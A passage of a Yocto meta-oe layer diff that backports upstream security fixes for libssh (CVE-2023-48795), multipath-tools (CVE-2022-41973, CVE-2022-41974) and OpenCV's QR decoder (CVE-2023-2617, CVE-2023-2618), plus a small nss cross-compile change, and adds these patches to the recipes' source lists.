++} ++ ++int ssh_kex_append_extensions(ssh_session session, struct ssh_kex_struct *pkex) ++{ ++ char *kex = NULL; ++ char *kex_tmp = NULL; ++ size_t kex_len, len; ++ ++ /* Here we append ext-info-c and kex-strict-c-v00@openssh.com for client ++ * and kex-strict-s-v00@openssh.com for server to the list of kex algorithms ++ */ ++ kex = pkex->methods[SSH_KEX]; + len = strlen(kex); +- /* Comma, comma, nul byte */ +- kex_len = len + 1 + strlen(KEX_EXTENSION_CLIENT) + 1 + strlen(KEX_STRICT_CLIENT ) + 1; ++ if (session->server) { ++ /* Comma, nul byte */ ++ kex_len = len + 1 + strlen(KEX_STRICT_SERVER) + 1; ++ } else { ++ /* Comma, comma, nul byte */ ++ kex_len = len + 1 + strlen(KEX_EXTENSION_CLIENT) + 1 + ++ strlen(KEX_STRICT_CLIENT) + 1; ++ } + if (kex_len >= MAX_PACKET_LEN) { + /* Overflow */ + return SSH_ERROR; +@@ -816,9 +835,16 @@ int ssh_set_client_kex(ssh_session session) + ssh_set_error_oom(session); + return SSH_ERROR; + } +- snprintf(kex_tmp + len, kex_len - len, ",%s,%s", KEX_EXTENSION_CLIENT, KEX_STRICT_CLIENT); +- client->methods[SSH_KEX] = kex_tmp; +- ++ if (session->server){ ++ snprintf(kex_tmp + len, kex_len - len, ",%s", KEX_STRICT_SERVER); ++ } else { ++ snprintf(kex_tmp + len, ++ kex_len - len, ++ ",%s,%s", ++ KEX_EXTENSION_CLIENT, ++ KEX_STRICT_CLIENT); ++ } ++ pkex->methods[SSH_KEX] = kex_tmp; + return SSH_OK; + } + +diff --git a/src/server.c b/src/server.c +index bc98da4f..f3d24a7b 100644 +--- a/src/server.c ++++ b/src/server.c +@@ -158,7 +158,13 @@ static int server_set_kex(ssh_session session) { + } + } + +- return 0; ++ /* Do not append the extensions during rekey */ ++ if (session->flags & SSH_SESSION_FLAG_AUTHENTICATED) { ++ return SSH_OK; ++ } ++ ++ rc = ssh_kex_append_extensions(session, server); ++ return rc; + } + + int ssh_server_init_kex(ssh_session session) { +-- +2.25.1 + diff --git a/meta-oe/recipes-support/libssh/libssh/CVE-2023-48795-3.patch b/meta-oe/recipes-support/libssh/libssh/CVE-2023-48795-3.patch new file mode 100644 index 0000000000..1635a4c2dc --- /dev/null +++ b/meta-oe/recipes-support/libssh/libssh/CVE-2023-48795-3.patch @@ -0,0 +1,47 @@ +From 5846e57538c750c5ce67df887d09fa99861c79c6 Mon Sep 17 00:00:00 2001 +From: Jakub Jelen <jjelen@redhat.com> +Date: Thu, 14 Dec 2023 12:22:01 +0100 +Subject: [PATCH] CVE-2023-48795: Strip extensions from both kex lists for + matching + +Signed-off-by: Jakub Jelen <jjelen@redhat.com> +Reviewed-by: Andreas Schneider <asn@cryptomilk.org> + +Upstream-Status: Backport [https://gitlab.com/libssh/libssh-mirror/-/commit/5846e57538c750c5ce67df887d09fa99861c79c6] +CVE: CVE-2023-48795 +Signed-off-by: Vijay Anusuri <vanusuri@mvista.com> +--- + src/kex.c | 16 ++++++++++++---- + 1 file changed, 12 insertions(+), 4 deletions(-) + +diff --git a/src/kex.c b/src/kex.c +index b03e6484..c100d908 100644 +--- a/src/kex.c ++++ b/src/kex.c +@@ -857,11 +857,19 @@ int ssh_kex_select_methods (ssh_session session){ + char *ext_start = NULL; + int i; + +- /* Here we should drop the ext-info-c from the list so we avoid matching. ++ /* Here we should drop the extensions from the list so we avoid matching. + * it. We added it to the end, so we can just truncate the string here */ +- ext_start = strstr(client->methods[SSH_KEX], ","KEX_EXTENSION_CLIENT); +- if (ext_start != NULL) { +- ext_start[0] = '\0'; ++ if (session->client) { ++ ext_start = strstr(client->methods[SSH_KEX], "," KEX_EXTENSION_CLIENT); ++ if (ext_start != NULL) { ++ ext_start[0] = '\0'; ++ } ++ } ++ if (session->server) { ++ ext_start = strstr(server->methods[SSH_KEX], "," KEX_STRICT_SERVER); ++ if (ext_start != NULL) { ++ ext_start[0] = '\0'; ++ } + } + + for (i = 0; i < KEX_METHODS_SIZE; i++) { +-- +2.25.1 + diff --git a/meta-oe/recipes-support/libssh/libssh_0.8.9.bb b/meta-oe/recipes-support/libssh/libssh_0.8.9.bb index c7e9c3320c..530dda1f4a 100644 --- a/meta-oe/recipes-support/libssh/libssh_0.8.9.bb +++ b/meta-oe/recipes-support/libssh/libssh_0.8.9.bb @@ -6,7 +6,12 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=dabb4958b830e5df11d2b0ed8ea255a0" DEPENDS = "zlib openssl" -SRC_URI = "git://git.libssh.org/projects/libssh.git;protocol=https;branch=stable-0.8" +SRC_URI = "git://git.libssh.org/projects/libssh.git;protocol=https;branch=stable-0.8 \ + file://CVE-2020-16135.patch \ + file://CVE-2023-48795-1.patch \ + file://CVE-2023-48795-2.patch \ + file://CVE-2023-48795-3.patch \ + " SRCREV = "04685a74df9ce1db1bc116a83a0da78b4f4fa1f8" S = "${WORKDIR}/git" diff --git a/meta-oe/recipes-support/multipath-tools/files/0001-multipath-tools-use-run-instead-of-dev-shm.patch b/meta-oe/recipes-support/multipath-tools/files/0001-multipath-tools-use-run-instead-of-dev-shm.patch new file mode 100644 index 0000000000..dd6af413ef --- /dev/null +++ b/meta-oe/recipes-support/multipath-tools/files/0001-multipath-tools-use-run-instead-of-dev-shm.patch @@ -0,0 +1,159 @@ +From 23e13a52a6213b11eda9a3b09df455f495f74e8d Mon Sep 17 00:00:00 2001 +From: Yogita Urade <yogita.urade@windriver.com> +Date: Tue, 13 Dec 2022 09:18:33 +0000 +Subject: [PATCH] multipath-tools: use /run instead of /dev/shm + +/dev/shm may have unsafe permissions. Use /run instead. +Use systemd's tmpfiles.d mechanism to create /run/multipath +early during boot. + +For backward compatibilty, make the runtime directory configurable +via the "runtimedir" make variable. + +Signed-off-by: Martin Wilck <mwilck@suse.com> +Reviewed-by: Benjamin Marzinski <bmarzins@redhat.com> + +CVE: CVE-2022-41973 + +References: +https://nvd.nist.gov/vuln/detail/CVE-2022-41973 + +Upstream-Status: Backport [https://github.com/opensvc/multipath-tools/commit/cb57b930fa690ab79b3904846634681685e3470f] + +Signed-off-by: Yogita Urade <yogita.urade@windriver.com> +--- + .gitignore | 2 ++ + Makefile.inc | 7 ++++++- + libmultipath/defaults.h | 3 +-- + multipath/Makefile | 11 ++++++++--- + multipath/{multipath.rules => multipath.rules.in} | 4 ++-- + multipath/tmpfiles.conf.in | 1 + + 6 files changed, 20 insertions(+), 8 deletions(-) + rename multipath/{multipath.rules => multipath.rules.in} (95%) + create mode 100644 multipath/tmpfiles.conf.in + +diff --git a/.gitignore b/.gitignore +index 9926756b..f90b0350 100644 +--- a/.gitignore ++++ b/.gitignore +@@ -8,6 +8,8 @@ + *.d + kpartx/kpartx + multipath/multipath ++multipath/multipath.rules ++multipath/tmpfiles.conf + multipathd/multipathd + mpathpersist/mpathpersist + .nfs* +diff --git a/Makefile.inc b/Makefile.inc +index 4eb08eed..648f91b4 100644 +--- a/Makefile.inc ++++ b/Makefile.inc +@@ -44,6 +44,7 @@ exec_prefix = $(prefix) + usr_prefix = $(prefix) + bindir = $(exec_prefix)/usr/sbin + libudevdir = $(prefix)/$(SYSTEMDPATH)/udev ++tmpfilesdir = $(prefix)/$(SYSTEMDPATH)/tmpfiles.d + udevrulesdir = $(libudevdir)/rules.d + multipathdir = $(TOPDIR)/libmultipath + man8dir = $(prefix)/usr/share/man/man8 +@@ -60,6 +61,7 @@ libdmmpdir = $(TOPDIR)/libdmmp + nvmedir = $(TOPDIR)/libmultipath/nvme + includedir = $(prefix)/usr/include + pkgconfdir = $(usrlibdir)/pkgconfig ++runtimedir := /$(RUN) + + GZIP = gzip -9 -c + RM = rm -f +@@ -95,7 +97,10 @@ OPTFLAGS += -Wextra -Wstrict-prototypes -Wformat=2 -Werror=implicit-int \ + -Wno-unused-parameter -Werror=cast-qual \ + -Werror=discarded-qualifiers + +-CPPFLAGS := -Wp,-D_FORTIFY_SOURCE=2 ++CPPFLAGS := $(FORTIFY_OPT) \ ++ -DBIN_DIR=\"$(bindir)\" -DMULTIPATH_DIR=\"$(plugindir)\" -DRUN_DIR=\"${RUN}\" \ ++ -DRUNTIME_DIR=\"$(runtimedir)\" \ ++ -DCONFIG_DIR=\"$(configdir)\" -DEXTRAVERSION=\"$(EXTRAVERSION)\" -MMD -MP + CFLAGS := $(OPTFLAGS) -DBIN_DIR=\"$(bindir)\" -DLIB_STRING=\"${LIB}\" -DRUN_DIR=\"${RUN}\" \ + -MMD -MP $(CFLAGS) + BIN_CFLAGS = -fPIE -DPIE +diff --git a/libmultipath/defaults.h b/libmultipath/defaults.h +index c2164c16..908e0ca3 100644 +--- a/libmultipath/defaults.h ++++ b/libmultipath/defaults.h +@@ -64,8 +64,7 @@ + #define DEFAULT_WWIDS_FILE "/etc/multipath/wwids" + #define DEFAULT_PRKEYS_FILE "/etc/multipath/prkeys" + #define DEFAULT_CONFIG_DIR "/etc/multipath/conf.d" +-#define MULTIPATH_SHM_BASE "/dev/shm/multipath/" +- ++#define MULTIPATH_SHM_BASE RUNTIME_DIR "/multipath/" + + static inline char *set_default(char *str) + { +diff --git a/multipath/Makefile b/multipath/Makefile +index e720c7f6..28976546 100644 +--- a/multipath/Makefile ++++ b/multipath/Makefile +@@ -12,7 +12,7 @@ EXEC = multipath + + OBJS = main.o + +-all: $(EXEC) ++all: $(EXEC) multipath.rules tmpfiles.conf + + $(EXEC): $(OBJS) $(multipathdir)/libmultipath.so $(mpathcmddir)/libmpathcmd.so + $(CC) $(CFLAGS) $(OBJS) -o $(EXEC) $(LDFLAGS) $(LIBDEPS) +@@ -26,7 +26,9 @@ install: + $(INSTALL_PROGRAM) -m 755 mpathconf $(DESTDIR)$(bindir)/ + $(INSTALL_PROGRAM) -d $(DESTDIR)$(udevrulesdir) + $(INSTALL_PROGRAM) -m 644 11-dm-mpath.rules $(DESTDIR)$(udevrulesdir) +- $(INSTALL_PROGRAM) -m 644 $(EXEC).rules $(DESTDIR)$(libudevdir)/rules.d/62-multipath.rules ++ $(INSTALL_PROGRAM) -m 644 multipath.rules $(DESTDIR)$(udevrulesdir)/56-multipath.rules ++ $(INSTALL_PROGRAM) -d $(DESTDIR)$(tmpfilesdir) ++ $(INSTALL_PROGRAM) -m 644 tmpfiles.conf $(DESTDIR)$(tmpfilesdir)/multipath.conf + $(INSTALL_PROGRAM) -d $(DESTDIR)$(man8dir) + $(INSTALL_PROGRAM) -m 644 $(EXEC).8.gz $(DESTDIR)$(man8dir) + $(INSTALL_PROGRAM) -d $(DESTDIR)$(man5dir) +@@ -43,9 +45,12 @@ uninstall: + $(RM) $(DESTDIR)$(man8dir)/mpathconf.8.gz + + clean: dep_clean +- $(RM) core *.o $(EXEC) *.gz ++ $(RM) core *.o $(EXEC) multipath.rules tmpfiles.conf + + include $(wildcard $(OBJS:.o=.d)) + + dep_clean: + $(RM) $(OBJS:.o=.d) ++ ++%: %.in ++ sed 's,@RUNTIME_DIR@,$(runtimedir),' $< >$@ +diff --git a/multipath/multipath.rules b/multipath/multipath.rules.in +similarity index 95% +rename from multipath/multipath.rules +rename to multipath/multipath.rules.in +index 0486bf70..5fb499e6 100644 +--- a/multipath/multipath.rules ++++ b/multipath/multipath.rules.in +@@ -1,8 +1,8 @@ + # Set DM_MULTIPATH_DEVICE_PATH if the device should be handled by multipath + SUBSYSTEM!="block", GOTO="end_mpath" + KERNEL!="sd*|dasd*|nvme*", GOTO="end_mpath" +-ACTION=="remove", TEST=="/dev/shm/multipath/find_multipaths/$major:$minor", \ +- RUN+="/usr/bin/rm -f /dev/shm/multipath/find_multipaths/$major:$minor" ++ACTION=="remove", TEST=="@RUNTIME_DIR@/multipath/find_multipaths/$major:$minor", \ ++ RUN+="/usr/bin/rm -f @RUNTIME_DIR@/multipath/find_multipaths/$major:$minor" + ACTION!="add|change", GOTO="end_mpath" + + IMPORT{cmdline}="nompath" +diff --git a/multipath/tmpfiles.conf.in b/multipath/tmpfiles.conf.in +new file mode 100644 +index 00000000..21be438a +--- /dev/null ++++ b/multipath/tmpfiles.conf.in +@@ -0,0 +1 @@ ++d @RUNTIME_DIR@/multipath 0700 root root - +-- +2.32.0 + diff --git a/meta-oe/recipes-support/multipath-tools/files/CVE-2022-41974.patch b/meta-oe/recipes-support/multipath-tools/files/CVE-2022-41974.patch new file mode 100644 index 0000000000..7cdb5f9bda --- /dev/null +++ b/meta-oe/recipes-support/multipath-tools/files/CVE-2022-41974.patch @@ -0,0 +1,164 @@ +From 0168696f95b5c610c3861ced8ef98accd1a83b91 Mon Sep 17 00:00:00 2001 +From: Benjamin Marzinski <bmarzins@redhat.com> +Date: Tue, 27 Sep 2022 12:36:37 +0200 +Subject: [PATCH] multipathd: ignore duplicated multipathd command keys + +multipath adds rather than or-s the values of command keys. Fix this. +Also, return an invalid fingerprint if a key is used more than once. + +CVE: CVE-2022-41974 + +References: +https://nvd.nist.gov/vuln/detail/CVE-2022-41974 +https://github.com/opensvc/multipath-tools/issues/59 + +Upstream-Status: Backport +[https://github.com/openSUSE/multipath-tools/commit/fbbf280a0e26026c19879d938ebb2a8200b6357c] + +Signed-off-by: Benjamin Marzinski <bmarzins@redhat.com> + +Signed-off-by: Yogita Urade <yogita.urade@windriver.com> +--- + multipathd/cli.c | 8 ++-- + multipathd/main.c | 104 +++++++++++++++++++++++----------------------- + 2 files changed, 57 insertions(+), 55 deletions(-) + +diff --git a/multipathd/cli.c b/multipathd/cli.c +index 800c0fbe..0a266761 100644 +--- a/multipathd/cli.c ++++ b/multipathd/cli.c +@@ -336,9 +336,11 @@ fingerprint(vector vec) + if (!vec) + return 0; + +- vector_foreach_slot(vec, kw, i) +- fp += kw->code; +- ++ vector_foreach_slot(vec, kw, i) { ++ if (fp & kw->code) ++ return (uint64_t)-1; ++ fp |= kw->code; ++ } + return fp; + } + +diff --git a/multipathd/main.c b/multipathd/main.c +index 8baf9abe..975287d2 100644 +--- a/multipathd/main.c ++++ b/multipathd/main.c +@@ -1522,61 +1522,61 @@ uxlsnrloop (void * ap) + /* Tell main thread that thread has started */ + post_config_state(DAEMON_CONFIGURE); + +- set_handler_callback(LIST+PATHS, cli_list_paths); +- set_handler_callback(LIST+PATHS+FMT, cli_list_paths_fmt); +- set_handler_callback(LIST+PATHS+RAW+FMT, cli_list_paths_raw); +- set_handler_callback(LIST+PATH, cli_list_path); +- set_handler_callback(LIST+MAPS, cli_list_maps); +- set_handler_callback(LIST+STATUS, cli_list_status); +- set_unlocked_handler_callback(LIST+DAEMON, cli_list_daemon); +- set_handler_callback(LIST+MAPS+STATUS, cli_list_maps_status); +- set_handler_callback(LIST+MAPS+STATS, cli_list_maps_stats); +- set_handler_callback(LIST+MAPS+FMT, cli_list_maps_fmt); +- set_handler_callback(LIST+MAPS+RAW+FMT, cli_list_maps_raw); +- set_handler_callback(LIST+MAPS+TOPOLOGY, cli_list_maps_topology); +- set_handler_callback(LIST+TOPOLOGY, cli_list_maps_topology); +- set_handler_callback(LIST+MAPS+JSON, cli_list_maps_json); +- set_handler_callback(LIST+MAP+TOPOLOGY, cli_list_map_topology); +- set_handler_callback(LIST+MAP+FMT, cli_list_map_fmt); +- set_handler_callback(LIST+MAP+RAW+FMT, cli_list_map_fmt); +- set_handler_callback(LIST+MAP+JSON, cli_list_map_json); +- set_handler_callback(LIST+CONFIG+LOCAL, cli_list_config_local); +- set_handler_callback(LIST+CONFIG, cli_list_config); +- set_handler_callback(LIST+BLACKLIST, cli_list_blacklist); +- set_handler_callback(LIST+DEVICES, cli_list_devices); +- set_handler_callback(LIST+WILDCARDS, cli_list_wildcards); +- set_handler_callback(RESET+MAPS+STATS, cli_reset_maps_stats); +- set_handler_callback(RESET+MAP+STATS, cli_reset_map_stats); +- set_handler_callback(ADD+PATH, cli_add_path); +- set_handler_callback(DEL+PATH, cli_del_path); +- set_handler_callback(ADD+MAP, cli_add_map); +- set_handler_callback(DEL+MAP, cli_del_map); +- set_handler_callback(SWITCH+MAP+GROUP, cli_switch_group); ++ set_handler_callback(LIST|PATHS, cli_list_paths); ++ set_handler_callback(LIST|PATHS|FMT, cli_list_paths_fmt); ++ set_handler_callback(LIST|PATHS|RAW|FMT, cli_list_paths_raw); ++ set_handler_callback(LIST|PATH, cli_list_path); ++ set_handler_callback(LIST|MAPS, cli_list_maps); ++ set_handler_callback(LIST|STATUS, cli_list_status); ++ set_unlocked_handler_callback(LIST|DAEMON, cli_list_daemon); ++ set_handler_callback(LIST|MAPS|STATUS, cli_list_maps_status); ++ set_handler_callback(LIST|MAPS|STATS, cli_list_maps_stats); ++ set_handler_callback(LIST|MAPS|FMT, cli_list_maps_fmt); ++ set_handler_callback(LIST|MAPS|RAW|FMT, cli_list_maps_raw); ++ set_handler_callback(LIST|MAPS|TOPOLOGY, cli_list_maps_topology); ++ set_handler_callback(LIST|TOPOLOGY, cli_list_maps_topology); ++ set_handler_callback(LIST|MAPS|JSON, cli_list_maps_json); ++ set_handler_callback(LIST|MAP|TOPOLOGY, cli_list_map_topology); ++ set_handler_callback(LIST|MAP|FMT, cli_list_map_fmt); ++ set_handler_callback(LIST|MAP|RAW|FMT, cli_list_map_fmt); ++ set_handler_callback(LIST|MAP|JSON, cli_list_map_json); ++ set_handler_callback(LIST|CONFIG|LOCAL, cli_list_config_local); ++ set_handler_callback(LIST|CONFIG, cli_list_config); ++ set_handler_callback(LIST|BLACKLIST, cli_list_blacklist); ++ set_handler_callback(LIST|DEVICES, cli_list_devices); ++ set_handler_callback(LIST|WILDCARDS, cli_list_wildcards); ++ set_handler_callback(RESET|MAPS|STATS, cli_reset_maps_stats); ++ set_handler_callback(RESET|MAP|STATS, cli_reset_map_stats); ++ set_handler_callback(ADD|PATH, cli_add_path); ++ set_handler_callback(DEL|PATH, cli_del_path); ++ set_handler_callback(ADD|MAP, cli_add_map); ++ set_handler_callback(DEL|MAP, cli_del_map); ++ set_handler_callback(SWITCH|MAP|GROUP, cli_switch_group); + set_unlocked_handler_callback(RECONFIGURE, cli_reconfigure); +- set_handler_callback(SUSPEND+MAP, cli_suspend); +- set_handler_callback(RESUME+MAP, cli_resume); +- set_handler_callback(RESIZE+MAP, cli_resize); +- set_handler_callback(RELOAD+MAP, cli_reload); +- set_handler_callback(RESET+MAP, cli_reassign); +- set_handler_callback(REINSTATE+PATH, cli_reinstate); +- set_handler_callback(FAIL+PATH, cli_fail); +- set_handler_callback(DISABLEQ+MAP, cli_disable_queueing); +- set_handler_callback(RESTOREQ+MAP, cli_restore_queueing); +- set_handler_callback(DISABLEQ+MAPS, cli_disable_all_queueing); +- set_handler_callback(RESTOREQ+MAPS, cli_restore_all_queueing); ++ set_handler_callback(SUSPEND|MAP, cli_suspend); ++ set_handler_callback(RESUME|MAP, cli_resume); ++ set_handler_callback(RESIZE|MAP, cli_resize); ++ set_handler_callback(RELOAD|MAP, cli_reload); ++ set_handler_callback(RESET|MAP, cli_reassign); ++ set_handler_callback(REINSTATE|PATH, cli_reinstate); ++ set_handler_callback(FAIL|PATH, cli_fail); ++ set_handler_callback(DISABLEQ|MAP, cli_disable_queueing); ++ set_handler_callback(RESTOREQ|MAP, cli_restore_queueing); ++ set_handler_callback(DISABLEQ|MAPS, cli_disable_all_queueing); ++ set_handler_callback(RESTOREQ|MAPS, cli_restore_all_queueing); + set_unlocked_handler_callback(QUIT, cli_quit); + set_unlocked_handler_callback(SHUTDOWN, cli_shutdown); +- set_handler_callback(GETPRSTATUS+MAP, cli_getprstatus); +- set_handler_callback(SETPRSTATUS+MAP, cli_setprstatus); +- set_handler_callback(UNSETPRSTATUS+MAP, cli_unsetprstatus); +- set_handler_callback(FORCEQ+DAEMON, cli_force_no_daemon_q); +- set_handler_callback(RESTOREQ+DAEMON, cli_restore_no_daemon_q); +- set_handler_callback(GETPRKEY+MAP, cli_getprkey); +- set_handler_callback(SETPRKEY+MAP+KEY, cli_setprkey); +- set_handler_callback(UNSETPRKEY+MAP, cli_unsetprkey); +- set_handler_callback(SETMARGINAL+PATH, cli_set_marginal); +- set_handler_callback(UNSETMARGINAL+PATH, cli_unset_marginal); +- set_handler_callback(UNSETMARGINAL+MAP, cli_unset_all_marginal); ++ set_handler_callback(GETPRSTATUS|MAP, cli_getprstatus); ++ set_handler_callback(SETPRSTATUS|MAP, cli_setprstatus); ++ set_handler_callback(UNSETPRSTATUS|MAP, cli_unsetprstatus); ++ set_handler_callback(FORCEQ|DAEMON, cli_force_no_daemon_q); ++ set_handler_callback(RESTOREQ|DAEMON, cli_restore_no_daemon_q); ++ set_handler_callback(GETPRKEY|MAP, cli_getprkey); ++ set_handler_callback(SETPRKEY|MAP|KEY, cli_setprkey); ++ set_handler_callback(UNSETPRKEY|MAP, cli_unsetprkey); ++ set_handler_callback(SETMARGINAL|PATH, cli_set_marginal); ++ set_handler_callback(UNSETMARGINAL|PATH, cli_unset_marginal); ++ set_handler_callback(UNSETMARGINAL|MAP, cli_unset_all_marginal); + + umask(077); + uxsock_listen(&uxsock_trigger, ux_sock, ap); +-- +2.31.1 diff --git a/meta-oe/recipes-support/multipath-tools/multipath-tools_0.8.4.bb b/meta-oe/recipes-support/multipath-tools/multipath-tools_0.8.4.bb index 5a8db08771..0d51263f66 100644 --- a/meta-oe/recipes-support/multipath-tools/multipath-tools_0.8.4.bb +++ b/meta-oe/recipes-support/multipath-tools/multipath-tools_0.8.4.bb @@ -48,6 +48,8 @@ SRC_URI = "git://github.com/opensvc/multipath-tools.git;protocol=http;branch=mas file://0001-add-explicit-dependency-on-libraries.patch \ file://0001-fix-boolean-value-with-json-c-0.14.patch \ file://0001-libmultipath-uevent.c-fix-error-handling-for-udev_mo.patch \ + file://0001-multipath-tools-use-run-instead-of-dev-shm.patch \ + file://CVE-2022-41974.patch \ " LIC_FILES_CHKSUM = "file://COPYING;md5=5f30f0716dfdd0d91eb439ebec522ec2" @@ -120,3 +122,6 @@ FILES:kpartx = "${base_sbindir}/kpartx \ RDEPENDS:${PN} += "kpartx" PARALLEL_MAKE = "" + +FILES:${PN}-libs += "usr/lib/*.so.*" +FILES:${PN}-libs += "usr/lib/tmpfiles.d/*" diff --git a/meta-oe/recipes-support/nss/nss/0001-nss-fix-support-cross-compiling.patch b/meta-oe/recipes-support/nss/nss/0001-nss-fix-support-cross-compiling.patch index eb6174a7b0..950fae667a 100644 --- a/meta-oe/recipes-support/nss/nss/0001-nss-fix-support-cross-compiling.patch +++ b/meta-oe/recipes-support/nss/nss/0001-nss-fix-support-cross-compiling.patch @@ -18,7 +18,12 @@ diff --git a/nss/coreconf/arch.mk b/nss/coreconf/arch.mk index 2012d18..78fca62 100644 --- a/nss/coreconf/arch.mk +++ b/nss/coreconf/arch.mk -@@ -30,7 +30,7 @@ OS_TEST := $(shell uname -m) +@@ -26,11 +26,11 @@ OS_ARCH := $(subst /,_,$(shell uname -s) + # Attempt to differentiate between sparc and x86 Solaris + # + +-OS_TEST := $(shell uname -m) ++OS_TEST ?= $(shell uname -m) ifeq ($(OS_TEST),i86pc) OS_RELEASE := $(shell uname -r)_$(OS_TEST) else diff --git a/meta-oe/recipes-support/opencv/opencv/CVE-2023-2617.patch b/meta-oe/recipes-support/opencv/opencv/CVE-2023-2617.patch new file mode 100644 index 0000000000..e5eafd4790 --- /dev/null +++ b/meta-oe/recipes-support/opencv/opencv/CVE-2023-2617.patch @@ -0,0 +1,88 @@ +commit ccc277247ac1a7aef0a90353edcdec35fbc5903c +Author: Nano <nanoapezlk@gmail.com> +Date: Wed Apr 26 15:09:52 2023 +0800 + + fix(wechat_qrcode): Init nBytes after the count value is determined (#3480) + + * fix(wechat_qrcode): Initialize nBytes after the count value is determined + + * fix(wechat_qrcode): Incorrect count data repair + + * chore: format expr + + * fix(wechat_qrcode): Avoid null pointer exception + + * fix(wechat_qrcode): return when bytes_ is empty + + * test(wechat_qrcode): add test case + + --------- + + Co-authored-by: GZTime <Time.GZ@outlook.com> + +CVE: CVE-2023-2617 + +Upstream-Status: Backport [https://github.com/opencv/opencv_contrib/commit/ccc277247ac1a7aef0a90353edcdec35fbc5903c] + +Signed-off-by: Soumya <soumya.sambu@windriver.com> +--- + +diff --git a/modules/wechat_qrcode/src/zxing/qrcode/decoder/decoded_bit_stream_parser.cpp b/modules/wechat_qrcode/src/zxing/qrcode/decoder/decoded_bit_stream_parser.cpp +index 05de793c..b3a0a69c 100644 +--- a/modules/wechat_qrcode/src/zxing/qrcode/decoder/decoded_bit_stream_parser.cpp ++++ b/modules/wechat_qrcode/src/zxing/qrcode/decoder/decoded_bit_stream_parser.cpp +@@ -65,7 +65,8 @@ void DecodedBitStreamParser::append(std::string& result, string const& in, + + void DecodedBitStreamParser::append(std::string& result, const char* bufIn, size_t nIn, + ErrorHandler& err_handler) { +- if (err_handler.ErrCode()) return; ++ // avoid null pointer exception ++ if (err_handler.ErrCode() || bufIn == nullptr) return; + #ifndef NO_ICONV_INSIDE + if (nIn == 0) { + return; +@@ -190,16 +191,20 @@ void DecodedBitStreamParser::decodeByteSegment(Ref<BitSource> bits_, string& res + CharacterSetECI* currentCharacterSetECI, + ArrayRef<ArrayRef<char> >& byteSegments, + ErrorHandler& err_handler) { +- int nBytes = count; + BitSource& bits(*bits_); + // Don't crash trying to read more bits than we have available. + int available = bits.available(); + // try to repair count data if count data is invalid + if (count * 8 > available) { +- count = (available + 7 / 8); ++ count = (available + 7) / 8; + } ++ size_t nBytes = count; ++ ++ ArrayRef<char> bytes_(nBytes); ++ // issue https://github.com/opencv/opencv_contrib/issues/3478 ++ if (bytes_->empty()) ++ return; + +- ArrayRef<char> bytes_(count); + char* readBytes = &(*bytes_)[0]; + for (int i = 0; i < count; i++) { + // readBytes[i] = (char) bits.readBits(8); +diff --git a/modules/wechat_qrcode/test/test_qrcode.cpp b/modules/wechat_qrcode/test/test_qrcode.cpp +index d59932b8..ec2559b0 100644 +--- a/modules/wechat_qrcode/test/test_qrcode.cpp ++++ b/modules/wechat_qrcode/test/test_qrcode.cpp +@@ -289,5 +289,16 @@ TEST_P(Objdetect_QRCode_Multi, regression) { + INSTANTIATE_TEST_CASE_P(/**/, Objdetect_QRCode_Curved, testing::ValuesIn(qrcode_images_curved)); + // INSTANTIATE_TEST_CASE_P(/**/, Objdetect_QRCode_Multi, testing::ValuesIn(qrcode_images_multiple)); + ++TEST(Objdetect_QRCode_bug, issue_3478) { ++ auto detector = wechat_qrcode::WeChatQRCode(); ++ std::string image_path = findDataFile("qrcode/issue_3478.png"); ++ Mat src = imread(image_path, IMREAD_GRAYSCALE); ++ ASSERT_FALSE(src.empty()) << "Can't read image: " << image_path; ++ std::vector<std::string> outs = detector.detectAndDecode(src); ++ ASSERT_EQ(1, (int) outs.size()); ++ ASSERT_EQ(16, (int) outs[0].size()); ++ ASSERT_EQ("KFCVW50 ", outs[0]); ++} ++ + } // namespace + } // namespace opencv_test diff --git a/meta-oe/recipes-support/opencv/opencv/CVE-2023-2618.patch b/meta-oe/recipes-support/opencv/opencv/CVE-2023-2618.patch new file mode 100644 index 0000000000..4cd3003e3c --- /dev/null +++ b/meta-oe/recipes-support/opencv/opencv/CVE-2023-2618.patch @@ -0,0 +1,32 @@ +From 2b62ff6181163eea029ed1cab11363b4996e9cd6 Mon Sep 17 00:00:00 2001 +From: Nano <nanoapezlk@gmail.com> +Date: Thu, 27 Apr 2023 17:38:35 +0800 +Subject: [PATCH] fix(wechat_qrcode): fixed memory leaks + +CVE: CVE-2023-2618 + +Upstream-Status: Backport [https://github.com/opencv/opencv_contrib/pull/3484/commits/2b62ff6181163eea029ed1cab11363b4996e9cd6] + +Signed-off-by: Narpat Mali <narpat.mali@windriver.com> +--- + .../src/zxing/qrcode/decoder/decoded_bit_stream_parser.cpp | 5 ++++- + 1 file changed, 4 insertions(+), 1 deletion(-) + +diff --git a/modules/wechat_qrcode/src/zxing/qrcode/decoder/decoded_bit_stream_parser.cpp b/modules/wechat_qrcode/src/zxing/qrcode/decoder/decoded_bit_stream_parser.cpp +index b3a0a69c..f02435d5 100644 +--- a/modules/wechat_qrcode/src/zxing/qrcode/decoder/decoded_bit_stream_parser.cpp ++++ b/modules/wechat_qrcode/src/zxing/qrcode/decoder/decoded_bit_stream_parser.cpp +@@ -127,7 +127,10 @@ void DecodedBitStreamParser::decodeHanziSegment(Ref<BitSource> bits_, string& re + while (count > 0) { + // Each 13 bits encodes a 2-byte character + int twoBytes = bits.readBits(13, err_handler); +- if (err_handler.ErrCode()) return; ++ if (err_handler.ErrCode()) { ++ delete[] buffer; ++ return; ++ } + int assembledTwoBytes = ((twoBytes / 0x060) << 8) | (twoBytes % 0x060); + if (assembledTwoBytes < 0x003BF) { + // In the 0xA1A1 to 0xAAFE range +-- +2.40.0 diff --git a/meta-oe/recipes-support/opencv/opencv_4.5.5.bb b/meta-oe/recipes-support/opencv/opencv_4.5.5.bb index e4fb676f7e..5b5685f990 100644 --- a/meta-oe/recipes-support/opencv/opencv_4.5.5.bb +++ b/meta-oe/recipes-support/opencv/opencv_4.5.5.bb @@ -39,12 +39,12 @@ IPP_MD5 = "${@ipp_md5sum(d)}" SRCREV_FORMAT = "opencv_contrib_ipp_boostdesc_vgg" SRC_URI = "git://github.com/opencv/opencv.git;name=opencv;branch=master;protocol=https \ - git://github.com/opencv/opencv_contrib.git;destsuffix=contrib;name=contrib;branch=master;protocol=https \ - git://github.com/opencv/opencv_3rdparty.git;branch=ippicv/master_20191018;destsuffix=ipp;name=ipp;protocol=https \ - git://github.com/opencv/opencv_3rdparty.git;branch=contrib_xfeatures2d_boostdesc_20161012;destsuffix=boostdesc;name=boostdesc;protocol=https \ - git://github.com/opencv/opencv_3rdparty.git;branch=contrib_xfeatures2d_vgg_20160317;destsuffix=vgg;name=vgg;protocol=https 